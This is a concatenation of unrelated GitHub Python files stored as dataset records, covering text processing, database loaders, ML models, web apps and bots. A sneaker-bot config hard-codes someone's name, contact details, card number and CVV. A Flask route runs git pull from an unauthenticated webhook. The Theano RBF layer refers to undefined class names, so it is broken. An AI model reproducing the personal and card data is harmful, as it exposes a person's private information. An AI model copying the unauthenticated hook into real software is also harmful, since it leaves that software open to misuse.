= open(r\"sample.txt\", \"r\")\n# doc = re.sub(r\"[(\\[\\]),;:\\.]\", \"\", file.read())\nstop_words = set(stopwords.words('english'))\nprint(stop_words)\ntokens =file.read().split()\nprint(tokens)\nre_punc = re.compile('[%s]' % re.escape(string.punctuation))\nword_tokens = [re_punc.sub('', w) for w in tokens]\n# print(word_tokens)\n# wordcount = Counter(word_tokens)\n# print(wordcount)\n# for i in set(word_tokens):\n# print(i,word_tokens.count(i))\n\n# csv_file = open('word.csv','a')\n# for i in set(word_tokens):\n# result=i+','+str(word_tokens.count(i))+'\\n'\n# csv_file.write(result)\n# csv_file.close()\nfiltered_sentence = [w for w in word_tokens if not w.lower() in stop_words and w not in \"\"]\n#\nwordcount = Counter(filtered_sentence)\nprint(wordcount)\nfirst3pairs =[word for word,cnt in wordcount.most_common(3)]\nprint(first3pairs)","repo_name":"thameem786/POC_CODE","sub_path":"demo/word count.py","file_name":"word count.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26126040406","text":"#思路1的生成器\ndef pascal_triangle1(n):\n list = [1]\n while n > 0:\n yield list\n list = [1] + [list[x] + list[x + 1] for x in range(len(list) - 1)] + [1]\n n -= 1\n return\nfor x in pascal_triangle1(5):\n print(x)\n\n\n#思路2的生成器\ndef pascal_triangle2(n):\n list = [1]\n while n > 0:\n yield list\n list = [1] + [x + y for x, y in zip(list[:], list[1:])] + [1]\n n -= 1\n return\nfor y in pascal_triangle2(10):\n print(y)","repo_name":"Danie1Hayes/Python-Notes","sub_path":"练习程序/杨辉三角.py","file_name":"杨辉三角.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28504064912","text":"import pymysql\nfrom auth import *\nimport pandas as pd\nimport time\n#read df already saved from running previous script\ndf = pd.read_csv('youtube.csv', index_col=0)\n\ndef connect_to_db():\n try:\n connection = pymysql.connect(host=ENDPOINT,user=USERNAME,\\\n password=DB_PASSWORD,database=DATABASE_NAME,port=PORT)\n except pymysql.OperationalError as e:\n raise e\n else:\n cursor = connection.cursor()\n print('Connected!')\n\n return connection, cursor\n\ndef create_table(cursor):\n query_create_table = (\"\"\"CREATE TABLE IF NOT EXISTS videos_details\n (video_id VARCHAR(100) PRIMARY KEY,\n video_title TEXT NOT NULL ,\n upload_date DATE NOT NULL,\n view_count int NOT NULL,\n like_count int NOT NULL,\n dislike_count int NOT NULL,\n comment_count int NOT NULL \n )\n \"\"\")\n cursor.execute(query_create_table)\n\ndef insert_row(cursor, video_id, video_title, upload_date, view_count, like_count, dislike_count, comment_count):\n query_insert_row = (\"\"\"\n INSERT INTO videos_details (video_id,video_title,upload_date,view_count\n , like_count, dislike_count,comment_count)\n VALUES (%s,%s,%s,%s,%s,%s,%s);\n \"\"\")\n values = (video_id, video_title, upload_date, view_count, like_count, dislike_count, comment_count)\n cursor.execute(query_insert_row,values)\n\ndef check_vid_not_exist(cursor,video_id):\n query_search_vid_id = (\"\"\"\n SELECT * FROM videos_details\n WHERE video_id = %s\n \"\"\")\n cursor.execute(query_search_vid_id,(video_id,))\n result = cursor.fetchone() is None\n return result\n\ndef insert_in_table(cursor):\n df2=pd.DataFrame(columns=list(df.columns))\n #iterate over all videos\n for i,row in df.iterrows():\n #for each video if it video_id doesn't exist,\n #insert row in table\n if check_vid_not_exist(cursor, 
row['video_id']):\n            insert_row(cursor, row['video_id'], row['video_title'], row['upload_date'], row['view_count']\n                       , row['like_count'], row['dislike_count'], row['comment_count'])\n        else:\n            df2 = df2.append(row)\n    return df2\n\ndef update_row(cursor, video_id, video_title, view_count, like_count, dislike_count, comment_count):\n    query_update_row = (\"\"\"UPDATE videos_details\n                SET video_title = %s,\n                view_count = %s,\n                like_count = %s,\n                dislike_count = %s,\n                comment_count = %s\n                WHERE video_id = %s;\"\"\")\n    values = (video_title, view_count, like_count, dislike_count, comment_count, video_id)\n    cursor.execute(query_update_row, values)\n\ndef update_table(cursor, df):\n    for i, row in df.iterrows():\n        update_row(cursor, row['video_id'], row['video_title'], row['view_count']\n                   , row['like_count'], row['dislike_count'], row['comment_count'])\n    \n#connect to db\nconnection, cursor = connect_to_db()\n#create table in db\ncreate_table(cursor)\n#insert values one by one into the table:\n#1/if they don't exist use INSERT INTO\ndf2 = insert_in_table(cursor)\nconnection.commit()\n#2/if they exist update video details\nupdate_table(cursor, df2)\nconnection.commit()\n#Fetch all to make sure everything worked\nquery_fetch_all = (\"\"\"\nSELECT * FROM videos_details;\n    \"\"\")\ncursor.execute(query_fetch_all)\ncursor.fetchall()\n#DROP table because of aws charges\nquery_fetch_all = (\"\"\"\nDROP TABLE videos_details;\n    \"\"\")\ncursor.execute(query_fetch_all)\nconnection.commit()\n#close the connection\nconnection.close()","repo_name":"FaithSmith/youtube_api_aws_rds","sub_path":"df_to_rds_aws.py","file_name":"df_to_rds_aws.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35056450351","text":"\"\"\"\nCurrently as of 11/30/2018, supreme allows for 2018-2028 as card expiration years \nThe years are 1-10 in the xpath selector for that dropdown.\n\"\"\"\n\nkeys = {\n    \"product_url\": \"https://www.supremenewyork.com/shop/accessories/oypgt0xhn\",\n    \"name\": \"Ahvi Blackwell\",\n    \"email\": \"alblackwelldev@outlook.com\",\n    \"phone_number\": 4152637658,\n    \"address\": \"1234 Grewnway Dr\",\n    \"city\": \"\",\n    \"state\": \"CA\",\n    \"zip\": 94803,\n    \"card_number\": 4232783632431124,\n    \"card_cvv\": 323,\n    \"credit_card_month\": 4,\n    \"credit_card_year\": 6 # see docs above\n}\n","repo_name":"ahvblackwelltech/supreme_bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"23040895545","text":"import argparse\nimport json\n\nimport torch\nfrom transformers import GenerationConfig, AutoModelForCausalLM, AutoTokenizer, AutoConfig\n\nfrom lora_model import LoraModelForCasualLM\nfrom prompt import Prompter\n\ndef get_response(prompt, tokenizer, model, generation_config, max_new_tokens):\n    inputs = tokenizer(prompt, return_tensors=\"pt\")\n    output = model.generate(\n        input_ids=inputs['input_ids'].cuda(),\n        generation_config=generation_config,\n        max_new_tokens=max_new_tokens,\n        do_sample=True)\n    output = tokenizer.batch_decode(output, skip_special_tokens=True)[0]\n    return output\n\ndef generate_inference(instruction: str, user_inp: str, model_path:str, lora_weights_path:str):\n    \n    top_k=40\n    top_p=128\n    temperature=0.1\n    load_8bit=True\n    num_beams =1\n    max_new_tokens =128\n\n    tokenizer = AutoTokenizer.from_pretrained(model_path)\n    \n    config = 
AutoConfig.from_pretrained(model_path)\n architecture = config.architectures[0]\n if \"Llama\" in architecture:\n print(\"Setting EOS, BOS, UNK, and PAD tokens for LLama tokenizer\")\n tokenizer.add_special_tokens(\n {\n \"eos_token\": \"\",\n \"bos_token\": \"\",\n \"unk_token\": \"\",\n }\n )\n tokenizer.pad_token_id = (\n 0 # unk. we want this to be different from the eos token\n )\n tokenizer.padding_side = \"left\"\n \n model = AutoModelForCausalLM.from_pretrained(\n model_path,\n load_in_8bit=load_8bit,\n torch_dtype=torch.float16,\n device_map=\"auto\")\n model = LoraModelForCasualLM.from_pretrained(\n model,\n lora_weights_path,\n torch_dtype=torch.float16)\n \n model.config.pad_token_id = tokenizer.pad_token_id\n model.config.bos_token_id = tokenizer.bos_token_id\n model.config.eos_token_id = tokenizer.eos_token_id\n model.eval()\n \n generation_config = GenerationConfig(\n temperature=temperature,\n top_p=top_p,\n top_k=top_k,\n num_beams=num_beams)\n \n prompter = Prompter()\n \n \n \n # instruction = input(\"Your Instruction: \")\n # user_inp = input(\"Your input (enter n/a if there is no): \")\n if user_inp.lower().strip() == \"n/a\":\n user_inp = None\n prompt = prompter.generate_prompt(instruction, user_inp)\n output = get_response(prompt, tokenizer, model, generation_config, max_new_tokens)\n response = prompter.get_response(output)\n return response\n \n","repo_name":"vietai-dev/nlp03","sub_path":"week6/distributed/assignment2/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"36792003384","text":"\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport os, base64, io, string\r\nimport azure.storage.blob as azureblob\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport json\r\nfrom keras.models import load_model\r\nfrom azure.storage.blob import BlockBlobService\r\n\r\n\r\ndef load_image_into_numpy_array(image):\r\n (im_width, im_height) = image.size\r\n return np.array(image.getdata()).reshape(\r\n (im_height, im_width, 3)).astype(np.uint8)\r\n\r\ndef int2base(x, base,maxlen=11, digs=string.digits + string.ascii_letters):\r\n if x < 0:\r\n sign = -1\r\n elif x == 0:\r\n return digs[0]*maxlen\r\n else:\r\n sign = 1\r\n x *= sign\r\n digits = []\r\n while x:\r\n digits.append(digs[int(x % base)])\r\n x //= base\r\n if maxlen>len(digits):\r\n digits += '0'*(maxlen - len(digits))\r\n if sign < 0:\r\n digits.append('-')\r\n digits.reverse()\r\n return ''.join(digits)\r\n\r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--filedir', required=True,\r\n help='The dir name of images to process. The path'\r\n 'may include a compute node\\'s environment'\r\n 'variables, such as'\r\n '$AZ_BATCH_NODE_SHARED_DIR/filename.txt')\r\n parser.add_argument('--model', required=True,\r\n help='The full file path to the model. 
The path'\r\n 'may include a compute node\\'s environment'\r\n 'variables, such as'\r\n '$AZ_BATCH_NODE_SHARED_DIR/filename.txt')\r\n parser.add_argument('--storageaccount', required=True,\r\n help='The name of the Azure Storage account that owns the'\r\n 'blob storage container to which to upload'\r\n 'results and from which to download images.')\r\n parser.add_argument('--storagecontainer', required=True,\r\n help='The Azure Blob storage container to which to'\r\n 'upload results.')\r\n parser.add_argument('--sastoken', required=True,\r\n help='The SAS token providing write access to the'\r\n 'Storage container.')\r\n parser.add_argument('--startqkey', required=False, default='0333313',\r\n help='the range of images that this task has to process')\r\n\r\n args = parser.parse_args()\r\n\r\n filedir = args.filedir\r\n startqkey= args.startqkey\r\n \r\n model_name = args.model\r\n model = load_model(model_name)\r\n labels = {0: 'iscloud', 1: 'ismine', 2: 'isnone'}\r\n\r\n # Create the blob client using the input container's SAS token.\r\n # This allows us to create a client that provides read\r\n # access only to the container.\r\n #blob_client_out = azureblob.BlockBlobService(account_name=args.storageaccount,\r\n # sas_token=args.sastoken)\r\n\r\n # blob_client = azureblob.BlockBlobService(\r\n # account_name=args.storageaccount,\r\n # account_key=args.accountkey)\r\n\r\n # blobs=blob_client.list_blobs(container_name=args.inputcontainer, prefix=filedir) \r\n \r\n # blobs_to_process = [blob.name for blob in blobs if '.jpg' in blob.name ]\r\n\r\n # for blob in blobs_to_process:\r\n # blob_client.get_blob_to_path(container_name=args.inputcontainer, blob_name= blob, file_path= blob.replace('/','_'))\r\n \r\n # local_file_names=[blob.replace('/','_') for blob in blobs_to_process]\r\n \r\n # imgdict={}\r\n # #imgdict['pippo']='pluto'\r\n # imgdict = create_color_gist(local_file_names)\r\n ntilesbase4='3'*(18-len(startqkey))\r\n ntiles = int(ntilesbase4,4)+1\r\n results = []\r\n for i in range(ntiles):\r\n ibase4=int2base(i,4, maxlen=18-len(startqkey))\r\n imgfile = os.path.join(filedir, startqkey+ ibase4 +\".jpg\")\r\n pilImg = Image.open(imgfile)\r\n x = load_image_into_numpy_array(pilImg)\r\n x = np.expand_dims(x, axis=0)\r\n y = model.predict(x)\r\n #result = \r\n res = {\"quadkey\" : startqkey+ ibase4, \"result\": {\"class\": labels[np.argmax(y[0])] , \"score\": float(np.max(y[0])) } } \r\n results.append(res) \r\n if i%100==0:\r\n print(i)\r\n # FINALLY\r\n output_file = 'score_out_'+startqkey+'.json'# needs to be the output dict, \r\n # needs to have no headers to append to other results later\r\n # and the reference to the image something like 0000/fiename.jpg\r\n \r\n with open(output_file, 'w') as file:\r\n file.write(json.dumps(results))\r\n \r\n '''\r\n with open(output_file, \"w\") as text_file:\r\n print(\"------------------------------\", file=text_file)\r\n print(\"Node: \" + os.environ['AZ_BATCH_NODE_ID'], file=text_file)\r\n print(\"Task: \" + os.environ['AZ_BATCH_TASK_ID'], file=text_file)\r\n print(\"Job: \" + os.environ['AZ_BATCH_JOB_ID'], file=text_file)\r\n print(\"Pool: \" + os.environ['AZ_BATCH_POOL_ID'], file=text_file)\r\n '''\r\n\r\n # Create the blob client using the output container's SAS token.\r\n # This allows us to create a client that provides write\r\n # access only to the container.\r\n blob_client = azureblob.BlockBlobService(account_name=args.storageaccount,\r\n sas_token=args.sastoken)\r\n\r\n output_file_path = os.path.realpath(output_file)\r\n\r\n 
print('Uploading file {} to container [{}]...'.format(\r\n output_file_path,\r\n args.storagecontainer))\r\n\r\n blob_client.create_blob_from_path(args.storagecontainer,\r\n output_file,\r\n output_file_path)\r\n\r\n\r\n ","repo_name":"noodlefrenzy/StrataDataLondon2018","sub_path":"az_batch/python_scoring_task.py","file_name":"python_scoring_task.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"26043131859","text":"from django.http import HttpResponse, Http404\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.db.utils import IntegrityError\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom api.utils import json\nfrom threadedcomments.models import ThreadedComment, RelatedComment\n\ndef relate_comment(request, acrion, comment_pk):\n if not request.user.is_authenticated():\n return HttpResponse(status=403)\n if not acrion in ('remove_vote', 'agree', 'disagree'):\n raise Http404\n comment = get_object_or_404(ThreadedComment, pk=comment_pk)\n if acrion == 'remove_vote':\n RelatedComment.objects.filter(user=request.user, comment=comment).delete()\n else:\n relate = RelatedComment.objects.get_or_create(comment=comment, user=request.user)[0]\n if acrion == 'agree':\n relate.relate = '+'\n else:\n relate.relate = '-'\n try:\n relate.save()\n except IntegrityError:\n pass\n return HttpResponse(status=200)\n\ndef remove_comment(request, comment_pk):\n if not request.user.is_superuser:\n return HttpResponse(status=403)\n comment = get_object_or_404(ThreadedComment, pk=comment_pk)\n comment.is_removed = True\n comment.save()\n obj = comment.content_object\n return redirect(obj.get_absolute_url())\n","repo_name":"modamania/otdohni","sub_path":"apps/api/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9277981391","text":"import torch.nn as nn\n'''Vanilla Autoencoder'''\nclass AutoEncoder(nn.Module):\n def __init__(self, image_size1: int, image_size2: int):\n super(AutoEncoder, self).__init__()\n self.encoder = nn.Sequential(\n # Orign AE\n nn.Linear(image_size1 * image_size2, 512),\n nn.ReLU(),\n nn.Linear(512, 32),\n nn.ReLU(),\n )\n self.decoder = nn.Sequential(\n nn.Linear(32, 512),\n nn.ReLU(),\n nn.Linear(512, image_size1 * image_size2),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n encoded = self.encoder(x)\n decoded = self.decoder(encoded)\n return encoded, decoded","repo_name":"heart-of-gol-d/HAE_Empowered_by_Quadratic_Neurons","sub_path":"quadratic_autoencoder/AEModel/AE.py","file_name":"AE.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7552642291","text":"from main import _\nfrom utils.HIGDialog import HIGDialog\n\nimport gtk\n\n\n#\n# Class for the display configurator. 
It displays the configurators of the\n# sensors of a display.\n#\nclass DisplayConfigurator(HIGDialog):\n\n def __init__(self, sensorconfigurators):\n\n HIGDialog.__init__(self, buttons=(gtk.STOCK_CLOSE, gtk.RESPONSE_CLOSE))\n self.set_property(\"title\", _(\"Configuration\"))\n\n def destroy(*args): self.destroy()\n\n self.connect(\"response\", destroy)\n\n # close functions\n pages = []\n for c in sensorconfigurators:\n if (c):\n lbl = gtk.Label(c.get_name())\n lbl.show()\n pages.append((c, lbl))\n\n # use a special page when there are no config options\n if (not pages):\n lbl = gtk.Label(_(\"This desklet is not configurable.\"))\n lbl.show()\n pages.append((lbl, None))\n\n # only use the notebook when there are more than one pages\n if (len(pages) == 1):\n self.vbox.add(pages[0][0])\n else:\n align = gtk.Alignment(0.0, 0.0, 0.0, 0.0)\n align.show()\n notebook = gtk.Notebook()\n notebook.set_property(\"border-width\", 6)\n notebook.show()\n align.add(notebook)\n self.vbox.pack_start(align, False, False, 0)\n for page, tab in pages:\n notebook.append_page(page, tab)\n\n self.show()\n\n","repo_name":"RaumZeit/gdesklets-core","sub_path":"display/DisplayConfigurator.py","file_name":"DisplayConfigurator.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74027686942","text":"import asyncio\n\nfrom werkzeug.utils import call_maybe_yield, cached_property\nimport aiopg\nfrom aiopg.sa import create_engine, dialect\nimport psycopg2\nfrom sqlalchemy.schema import CreateTable\nfrom sqlalchemy.sql import ClauseElement\n\nfrom galerka.util import asyncached\n\n\ndef postgres_middleware(app):\n @asyncio.coroutine\n def add_postgres(environ, start_response):\n connection = SQLConnection(environ['galerka.postgres.get_pool'])\n environ['galerka.postgres.connection'] = connection\n try:\n result = yield from call_maybe_yield(app, environ, start_response)\n return result\n except:\n yield from connection.rollback()\n raise\n else:\n yield from connection.commit()\n finally:\n yield from connection.close()\n return add_postgres\n\n\nclass SQLConnection:\n def __init__(self, get_pool):\n self.get_pool = get_pool\n self.connection = None\n self.transaction = None\n\n @asyncached\n def pool(self):\n return (yield from self.get_pool())\n\n @asyncio.coroutine\n def execute(self, query, *multiparams, **params):\n if not self.connection:\n pool = yield from self.pool\n self.connection = yield from pool.acquire()\n self.transaction = yield from self.connection.begin()\n if isinstance(query, ClauseElement):\n print(query.compile(dialect=dialect))\n else:\n print(repr(query), multiparams, params)\n result = yield from self.connection.execute(query,\n *multiparams,\n **params)\n return result\n\n @asyncio.coroutine\n def commit(self):\n if self.transaction:\n yield from self.transaction.commit()\n\n @asyncio.coroutine\n def rollback(self):\n if self.transaction:\n yield from self.transaction.rollback()\n\n @asyncio.coroutine\n def close(self):\n if self.connection:\n yield from self.connection.close()\n\n\ndef postgres_pool_factory(dsn, tables):\n @asyncio.coroutine\n def get_pool():\n pool = yield from create_engine(dsn)\n\n connection = yield from pool.acquire()\n try:\n result = yield from connection.execute(\n 'SELECT tablename FROM pg_tables '\n 'WHERE schemaname=%s', ('public', ))\n existing_table_names = {name[0] for name in result}\n print('Existing tables:', existing_table_names)\n\n for name, table in 
tables.metadata.tables.items():\n if name not in existing_table_names:\n create_statement = CreateTable(table)\n print(create_statement.compile(dialect=dialect))\n yield from connection.execute(create_statement)\n finally:\n connection.close()\n\n return pool\n pool_future = asyncio.Task(get_pool())\n\n @asyncio.coroutine\n def get_pool():\n return (yield from pool_future)\n\n return get_pool\n\n\nclass PostgresMixin:\n def execute_sql(self, *args, **k):\n return self.environ['galerka.postgres.connection'].execute(*args, **k)\n\n @cached_property\n def sql_tables(self, *args, **k):\n return self.environ['galerka.postgres.tables']\n","repo_name":"encukou/galerka","sub_path":"galerka/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28551543560","text":"import math\n\nimport theano\n\nimport theano.tensor as T\nimport theano.tensor.nlinalg as alg\n\nclass RBF_layer(Network_Layer):\n\n def __init__(self, m_c_init, v_c_init, non_linear = True):\n\n # We create the theano variables for the means and variances\n\n self.m_c = theano.shared(value = m_c_init.astype(theano.config.floatX),\n name='m_c', borrow = True)\n\n self.v_c = theano.shared(value = v_c_init.astype(theano.config.floatX),\n name='v_c', borrow = True)\n self.w = theano.shared(value = m_c_init.astype(theano.config.floatX),\n name='c', borrow = True)\n # We store the type of activation function\n\n self.non_linear = non_linear\n\n # We store the number of inputs\n\n self.n_inputs = theano.shared(int(m_c_init.shape[ 1 ]))\n\n @staticmethod\n def n_pdf(x):\n\n return 1.0 / T.sqrt(2 * math.pi) * T.exp(-0.5 * x**2)\n\n @staticmethod\n def n_cdf(x):\n\n return 0.5 * (1.0 + T.erf(x / T.sqrt(2.0)))\n\n @staticmethod\n def gamma(x):\n\n return Network_layer.n_pdf(x) / Network_layer.n_cdf(-x)\n\n @staticmethod\n def beta(x):\n\n return Network_layer.gamma(x) * (Network_layer.gamma(x) - x)\n\n def output_probabilistic(self, m_c_previous, v_c_previous):\n\n # We add an additional deterministic input with mean 1 and variance 0\n\n #m_c_previous_with_bias = \\\n #T.concatenate([ m_c_previous, T.alloc(1, 1) ], 0)\n #v_c_previous_with_bias = \\\n #T.concatenate([ v_c_previous, T.alloc(0, 1) ], 0)\n\n # We compute the mean and variance after the linear operation\n\n\n m_linear = self.m_c - m_c_previous\n\n #m_linear = T.dot(self.m_c, m_c_previous_with_bias) / T.sqrt(self.n_inputs)\n v_linear = self.v_c\n\n if (self.non_linear):\n\n # We compute the mean and variance after the RBF activation\n\n lam = 0.1\n v_1 = 1 + 2*lam*v_linear\n\n\n v_1_inv = v_1**-1\n s_1 = T.prod(v_1,axis=1)**-0.5\n\n v_2 = 1 + 4*lam*v_linear\n v_2_inv = v_2**-1\n\n\n s_2 = T.prod(v_2,axis=1)**-0.5\n\n\n\n v_inv = v_linear**-1\n\n\n\n\n\n exponent1 = m_linear*(1 - v_1_inv)*v_inv\n\n exponent1 = T.sum(exponent1,axis=1)\n\n exponent2 = m_linear**2*(1 - v_2_inv)*v_inv\n\n exponent2 = T.sum(exponent2,axis=1)\n\n\n m_a = s_1*T.exp(-0.5*exponent1)\n\n\n v_a = s_2*T.exp(-0.5*exponent2) - m_a**2\n\n\n # lam = 1\n # I = T.eye(self.n_inputs)\n#\n # v_1 = I + 2*lam*v_linear\n # print_op= theano.printing.Print('v_1')\n # v_1 = print_op(v_1)\n#\n # def compute_inverse(v):\n # return alg.MatrixInverse()(v)\n#\n#\n # v_1_inv,update = theano.map(compute_inverse, sequences=v_1)\n # s_1,update = theano.map(lambda v: alg.Det()(v), sequences=v_1)\n # s_1 = s_1**-0.5\n#\n#\n # v_2 = I + 4*lam*v_linear\n # v_2_inv,update = theano.map(lambda v: 
alg.MatrixInverse()(v), sequences=v_2)\n # s_2,update = theano.map(lambda v: alg.Det()(v), sequences=v_2)\n#\n # s_2 = s_2**-0.5\n # v_inv,update = theano.map(lambda v: alg.MatrixInverse()(v), sequences=v_linear)\n#\n # m_a = s_1*T.exp(-0.5*m_linear.T*(I - v_1_inv)*v_inv*m_linear)\n#\n # v_a = s_2*T.exp(-0.5*m_linear.T*(I - v_2_inv)*v_inv*m_linear - m_a**2)\n return (m_a, v_a)\n\n else:\n\n return (m_linear, v_linear)\n\n def output_deterministic(self, output_previous):\n\n # We add an additional input with value 1\n\n output_previous_with_bias = \\\n T.concatenate([ output_previous, T.alloc(1, 1) ], 0) / \\\n T.sqrt(self.n_inputs)\n\n # We compute the mean and variance after the linear operation\n\n a = T.dot(self.w, output_previous_with_bias)\n\n if (self.non_linear):\n\n # We compute the ReLU activation\n\n a = T.switch(T.lt(a, T.fill(a, 0)), T.fill(a, 0), a)\n\n return a\n","repo_name":"jefshe/rbfnn-ep-thesis","sub_path":"EP/rbf_layer.py","file_name":"rbf_layer.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15807423679","text":"import flask\nimport data_proc as db_tool\nimport math\nimport os\nfrom datetime import timedelta\napp = flask.Flask(__name__)\napp.config[\"SEND_FILE_MAX_AGE_DEFAULT\"] = timedelta(seconds=1)\n\n\n@app.route(\"/hook\", methods=['POST'])\ndef hook():\n # 调用本地脚本进行更新\n os.system(\"git pull\")\n return 'ok'\n\n\n@app.route(\"/data/\")\ndef data(data_name):\n file_name = \"data/\"+data_name+\".csv\"\n if os.path.exists(file_name):\n return flask.render_template('data.html',\n data=flask.Markup(db_tool.markdown_trans(db_tool.to_table(file_name, \",\"))))\n else:\n return flask.render_template('404.html')\n\n\n@app.route(\"/download/\", methods=['GET'])\ndef download_file(filename):\n return flask.send_from_directory(\"data\", filename+\".csv\", as_attachment=True)\n\n\n@app.route(\"/article/\")\ndef article(article_id):\n if article_id in db_tool.articles:\n entity = db_tool.articles[article_id]\n return flask.render_template(\"article.html\", title=entity['title'],\n date=entity['date'], html=flask.Markup(entity['html']),\n detail_tags=flask.Markup(db_tool.get_detail_tags_html(article_id)))\n else:\n return flask.render_template('404.html')\n\n\ndef paging_html(objs, show_head, href):\n page_size = 7\n max_paging = 3\n paging = flask.request.args.get('paging')\n if paging is None or str(paging).isdigit():\n size = math.ceil(len(objs) / page_size)\n if paging is None:\n cur_page = 1\n elif int(paging) <= size:\n cur_page = int(paging)\n else:\n cur_page = 0\n if cur_page == 0:\n return flask.render_template('404.html')\n else:\n list_data = flask.Markup(''.join(objs[((cur_page - 1) * page_size):(cur_page * page_size)]))\n return flask.render_template(\"home.html\",\n list_data=list_data,\n list_title=show_head,\n paging=flask.Markup(db_tool.get_paging(size, cur_page, max_paging, href)))\n else:\n return flask.render_template('404.html')\n\n\n@app.route(\"/\")\ndef hello():\n content = list()\n for item in db_tool.home_index:\n content.append(db_tool.get_item_html(item['article_id'], item['title'], item['date']))\n return paging_html(content, 'Recent Update', '')\n\n\n@app.route(\"/about\")\ndef about():\n return flask.render_template(\"about.html\")\n\n\n@app.route(\"/tags\")\ndef tags():\n out = list()\n for key in db_tool.tags_index:\n out.append(db_tool.get_tags_html(key))\n return flask.render_template(\"tags.html\", 
tags=flask.Markup(''.join(out)))\n\n\n@app.route(\"/categories\")\ndef categories():\n out = list()\n for key in db_tool.category_index:\n out.append(db_tool.get_category_html(key))\n return flask.render_template(\"categories.html\", cate=flask.Markup(''.join(out)))\n\n\n@app.route('/categories_list//')\ndef categories_list(cate_key, sub_cate):\n content = list()\n for item in db_tool.category_index[cate_key][sub_cate]:\n content.append(db_tool.get_item_html(item['article_id'], item['title'], item['date']))\n return paging_html(content, \"分类:\"+cate_key+\" > \"+sub_cate,\n '/categories_list/'+cate_key+\"/\"+sub_cate)\n\n\n@app.route('/tags_list//')\ndef tags_list(tag_key, sub_tag):\n content = list()\n for item in db_tool.tags_index[tag_key][sub_tag]:\n content.append(db_tool.get_item_html(item['article_id'], item['title'], item['date']))\n return paging_html(content, \"标签:\"+tag_key + \" > \" + sub_tag,\n '/tags_list/'+tag_key+'/'+sub_tag)\n\n\n@app.route(\"/images/\")\ndef index(image_id):\n image = open(\"images/{}.svg\".format(image_id))\n resp = flask.Response(image, mimetype=\"image/svg+xml\")\n return resp\n\n\nif __name__ == \"__main__\":\n app.run('0.0.0.0', 80)\n","repo_name":"cador/flask_blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10723226832","text":"import requests\n\n\nasync def tell_joke(self, message):\n if \"joke\" in message.content:\n joke = requests.get(\n \"https://official-joke-api.appspot.com/random_joke\")\n json = joke.json()\n text = f\"**{json['setup']}**\"\n message = await message.channel.send(text)\n self.punchlines[message.id] = json[\"punchline\"]\n\n await message.add_reaction(\"❓\")\n\n return True\n\n return False\n\n\nasync def tell_punchline(self, message):\n if message.id in self.punchlines:\n punchline = self.punchlines[message.id]\n del self.punchlines[message.id]\n message = await message.channel.send(punchline)\n\n for emoji in [\"🤬\", \"😕\", \"😐\", \"🤣\", \"🤪\"]:\n await message.add_reaction(emoji)\n","repo_name":"womogenes/kiddos-bot","sub_path":"Client/_jokes.py","file_name":"_jokes.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33625843737","text":"import sqlite3 \nimport csv\nimport time\n\nDB_FILE=\"../northpoint.db\"\n\ndb = sqlite3.connect(DB_FILE) \nc = db.cursor() \n# change total_stories to number stories you want in db\ntotal_stories = 20\n\nc.execute(\"CREATE TABLE IF NOT EXISTS stories (story_id INTEGER, name TEXT, edit TEXT, editor TEXT, timestamp INTEGER)\")\n\nwith open('../data/stories.csv') as file:\n list = csv.reader(file)\n for row in list:\n if total_stories == 0:\n break\n info = [int(row[0]), row[1], row[2], row[3], int(time.time())]\n c.execute(\"INSERT INTO stories VALUES(?,?,?,?,?)\", info)\n total_stories -= 1\n \ndb.commit()\ndb.close()","repo_name":"weiwenzhou/Northpoint","sub_path":"util/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8232553235","text":"# encoding: utf-8\n\"\"\"\n@author: Liurunzhi\n@time: 2021/8/13 10:29\n@Describe:鱼的跟踪检测,拿到跟踪框的坐标\n\"\"\"\nimport sys\n\nsys.path.insert(0, './yolov5')\n\nfrom yolov5.utils.google_utils import attempt_download\nfrom yolov5.models.experimental import attempt_load\nfrom 
